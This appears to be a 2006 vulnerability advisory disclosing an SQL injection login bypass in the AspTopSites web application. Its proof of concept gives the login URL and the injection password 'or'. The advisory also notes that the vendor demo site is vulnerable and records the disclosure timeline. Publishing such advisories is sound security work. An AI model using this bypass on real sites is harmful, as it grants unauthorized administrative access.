------------------------------------------------------------ - EXPL-A-2006-001 exploitlabs.com Advisory 047 - ------------------------------------------------------------ - AspTopSites - AFFECTED PRODUCTS ================= AspTopSites http://www.maine-net.com/aspts.asp OVERVIEW ======== AspTopSites® runs on your Windows NT/2K/2003 Server and uses Active Server Pages with a MS Access 2000 database. Simply upload AspTopSites®, make one configuration setting and you're ready to start running your own TopSites traffic generator. AspTopSites® comes with full source code... no encoding or DLLs need to be installed on the server. DETAILS ======= 1. SQL Injection AspTopSites does not filter SQL resulting in full access to the user manager menu. POC === 1. entering SQL Injection type statement in the password field causes the statement to be true. http://[host]/topsites/default.asp <--- view listings http://[host]/topsites/goto.asp?id=43 <--- mouseover id value http://[host]/topsites/includeloginuser.asp <--- login here user: [ id value ] password: 'or' note: Vendor Demo Site is Vuln SOLUTION: ========= vendor contact: Jan 3, 2006 wills@maine-net.com ( no resp ) Jan 10, 2006 ( no resp => release ) Credits ======= This vulnerability was discovered and researched by Donnie Werner of exploitlabs Donnie Werner mail: wood at exploitlabs.com mail: morning_wood at zone-h.org -- web: http://exploitlabs.com web: http://zone-h.org http://exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt